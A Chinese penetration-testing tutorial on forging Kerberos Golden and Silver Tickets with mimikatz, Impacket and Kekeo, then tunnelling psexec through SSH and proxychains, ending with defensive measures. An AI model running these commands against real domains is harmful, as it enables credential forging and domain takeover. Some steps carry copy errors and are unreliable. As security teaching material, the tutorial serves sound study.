通过SSH隧道传递票证

No.1

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经雷神众测允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。

No.2

前言

PTT攻击方法代替明文密码或NTLM哈希的使用Kerberos票据。可能PTT最常见的用途是使用金色和银色门票。通过PTT获得对主机的访问是相当简单的

No.3

金票

你有普通域用户权限,但是没有域的权限，知道账户hash,krbtgt，krbtgt密码未修改,该票据可以重新获得域管理员权限,利用krbtgt的HASH值可以伪造生成任意的TGT(mimikatz),能够绕过对任意用户的账号策略,让用户成为任意组的成员,可用于Kerberos认证的任何服务

• 需要与DC通信
• 需要krbtgt用户的hash

要创建Golden Ticket，我们需要从目标域获取以下信息：

• krbtgt帐户NT哈希
• 域SID
• 域FQDN

首先获取域ID和krbtgt用户hash：

mimikatz# lsadump::lsa /patch

我们将使用Impacket的示例脚本ticketer.py来创建Golden Ticket凭证缓存（ccache）文件。以下是为用户创建ccache文件

./ticketer.py -nthash NT哈希 -domain-sid DOMAIN-SID -domain DOMAIN.FQDN

要使Impacket示例脚本能够使用ccache文件进行身份验证，而不是提供明文密码或NT哈希，我们需要将KRB5CCNAME变量设置为ccache文件的绝对路径：

export KRB5CCNAME=/path/to/ccache/file

验证变量设置是否正确：

echo $KRB5CCNAME

现在我们可以将-k标志与任何支持Kerberos身份验证的Impacket脚本一起使用，以使用Golden Ticket，而不是提供明文密码或NT哈希值。

No.4

名称解析

为了确保Kerberos进程功能，我们需要修改/etc/hosts攻击者计算机的文件，以包含目标域控制器的FQDN和目标主机的NetBIOS名称的条目。

nano /etc/hosts

127.0.0.1localhost 192.168.75.128aaa.bbb(FQDN) 192.168.75.137 WIN-111(NETbios)

如果您还没有域控制器的IP地址，请通过目标Linux主机上的SSH会话在目标域的FQDN上运行nslookup。例如：

nslookup -type=srv _ldap._tcp.aaa.bbb

No.5

Proxychains

我们将使用代理链通过SSH隧道路由我们的流量。通过查看配置文件的最后一行来验证代理链端口，/etc/proxychains.conf默认情况下在Kali上。

创建一个SOCKS代理，代理链将路由流量

ssh unpriv@10.0.10.81 -D 1337

要验证隧道是否已正确设置，我们可以使用代理链对目标主机的端口445运行nmap TCP连接扫描：

proxychains nmap -sT -Pn -p445 192.168.75.137

No.6

时间同步

运行以下命令将返回交互式CMD提示：

proxychains net time -S <IP-of-DC> proxychains net time set -S <IP-of-DC>

No.7

启动攻击

运行以下命令将返回交互式CMD提示：

proxychains ./psexec.py user@WIN-111 -k -no-pass

也可以用MSF

use exploit/windows/smb/psexec_psh

No.8

银票

两个票据之间的区别：

访问权限不同

Golden Ticket：伪造TGT,可以获取任何Kerberos服务权限 Silver Ticket：伪造TGS,只能访问指定的服务

加密方式不同

Golden Ticket ：由Kerberos的Hash加密 Silver Ticket ：由服务账号(通常为计算机账户)Hash加密

认证流程不一样

Golden Ticket 的利用过程需要访问域控,而Silver Ticket不需要

No.9

伪造票据

要生成银票，我们需要以下信息：

• 目标主机帐户NTLM哈希
• 目标主机FQDN
• 目标服务
• 域SID
• 域FQDN

使用Mimikatz的Kerberos模块生成Silver Ticket ：

kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE

退出Mimikatz并启动Kekeo。使用以下语法将kirbi文件转换为ccache文件：

misc::convert ccache /path/to/ticket.kirbi

您可以使用以下语法转换多个kirbi票证：

misc::convert ccaches /path/to/ticket1.kirbi /path/to/ticket2.kirbi ...

将ccache文件Kekeo输出复制到攻击Linux主机。确保在Linux主机上记下文件的绝对路径; 我们需要它来设置KRB5CCNAME变量。其余的攻击使用我们的Linux主机。

No.10

攻击设置

剩余的Silver Ticket攻击设置与Golden Ticket攻击大致类似，但有两个例外。

首先，我们需要在/etc/hosts文件中提供目标主机的FQDN ，而不是NetBIOS名称。对于我们的示例，该/etc/hosts文件应如下所示：

127.0.0.1localhost 192.168.26.129aaa.bbb 192.168.26.128 WIN-111.aaa.bbb

第二个区别是我们需要将攻击机器的时间与目标主机同步; Silver Tickets不与目标的域控制器通信。

按照与上面的Golden Ticket攻击相同的步骤设置KRB5CCNAME变量，验证代理链配置，使用SOCKS代理建立SSH隧道，并使用nmap验证隧道。

No.11

启动攻击

我们现在可以psexec.py针对目标主机的FQDN 启动攻击：

proxychains python psexec.py user@WIN-111.aaa.bbb -k -no-pass

No.12

防御手段

针对黄金票据 1.设置域管理员权限，只允许登陆域管服务器和少数管理服务器，同时也不能让其他管理员账户登陆个人主机，这样可以有效防止攻击者获取到域管权限从而窃取ntds.dit，以此防止获取KBRBTHGT账户hash。 2.禁用KRBTGT账户，此时在Kerberos票据进行签署PAC并加密TGT时，会检查KRBTGT以前的密码来进行验证，保存好以前的密码。 3.定期更换KRBTHTGT密码，确保每年至少更改一次密码 4.当攻击者创建黄金票据时，通过快速更改密码，使其失效。 针对白银票据 1.尽量保证服务器凭证不被窃取 2.开启PAC (Privileged Attribute Certificate) 特权属性证书保护功能。

END